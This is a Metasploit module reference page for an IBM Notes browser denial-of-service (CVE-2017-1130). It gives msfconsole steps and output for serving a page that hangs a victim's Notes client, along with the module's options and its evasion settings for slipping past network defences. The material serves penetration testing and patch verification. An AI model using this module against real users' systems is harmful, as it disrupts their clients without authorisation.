IBM Notes Denial Of Service - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/ibm_lotus_notes2 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: IBM Notes Denial Of Service
Module: auxiliary/dos/http/ibm_lotus_notes2
Source code: modules/auxiliary/dos/http/ibm_lotus_notes2.rb
Disclosure date: 2017-08-31
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-1130

This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. If successful, the browser will crash after viewing the webpage.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/http/ibm_lotus_notes2
msf auxiliary(ibm_lotus_notes2) > exploit

Knowledge Base


Vulnerable Application


This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.

If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, would cause the client hang and have to be restarted.

Affected Products and Versions

IBM Notes 9.0.1 to 9.0.1 FP8 IF1 IBM Notes 9.0 to 9.0 IF4. IBM Notes 8.5.3 to 8.5.3 FP6 IF13. IBM Notes 8.5.2 to 8.5.2 FP4 IF3. IBM Notes 8.5.1. to 8.5.1 FP5 IF5. IBM Notes 8.5 release

Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384

Verification Steps


Start msfconsole

use auxiliary/dos/http/ibm_lotus_notes2.rb

Set SRVHOST

Set SRVPORT

run (Server started) Visit server URL in the built-in web-browser of IBM Notes client application

Scenarios


msf > use auxiliary/dos/http/ibm_lotus_notes2 
msf auxiliary(ibm_lotus_notes2) > show options 

Module options (auxiliary/dos/http/ibm_lotus_notes2):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  


msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes2) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes2) > 
[*] Using URL: http://192.168.0.50:9092/mypath
[*] Server started.
msf auxiliary(ibm_lotus_notes2) > 

At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.

Go back to menu.

Msfconsole Usage


Here is how the dos/http/ibm_lotus_notes2 auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/ibm_lotus_notes2

msf6 auxiliary(dos/http/ibm_lotus_notes2) > show info

       Name: IBM Notes Denial Of Service
     Module: auxiliary/dos/http/ibm_lotus_notes2
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-08-31

Provided by:
  Dhiraj Mishra

Available actions:
  Name       Description
  ----       -----------
  WebServer  Serve exploit via web server

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Description:
  This module exploits a vulnerability in the native browser that 
  comes with IBM Lotus Notes. If successful, the browser will crash 
  after viewing the webpage.

References:
  https://www.exploit-db.com/exploits/42604
  https://nvd.nist.gov/vuln/detail/CVE-2017-1130

Module Options


This is a complete list of options available in the dos/http/ibm_lotus_notes2 auxiliary module:

msf6 auxiliary(dos/http/ibm_lotus_notes2) > show options

Module options (auxiliary/dos/http/ibm_lotus_notes2):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Serve exploit via web server

Advanced Options


Here is a complete list of advanced options supported by the dos/http/ibm_lotus_notes2 auxiliary module:

msf6 auxiliary(dos/http/ibm_lotus_notes2) > show advanced

Module advanced options (auxiliary/dos/http/ibm_lotus_notes2):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ListenerComm                     no        The specific communication channel to use for this service
   SSLCipher                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression  false            no        Enable SSL/TLS-level compression
   SendRobots      false            no        Return a robots.txt file if asked for one
   URIHOST                          no        Host to use in URI (useful for tunnels)
   URIPORT                          no        Port to use in URI (useful for tunnels)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/ibm_lotus_notes2 module can do:

msf6 auxiliary(dos/http/ibm_lotus_notes2) > show actions

Auxiliary actions:

   Name       Description
   ----       -----------
   WebServer  Serve exploit via web server

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/ibm_lotus_notes2 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/ibm_lotus_notes2) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Dhiraj Mishra

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.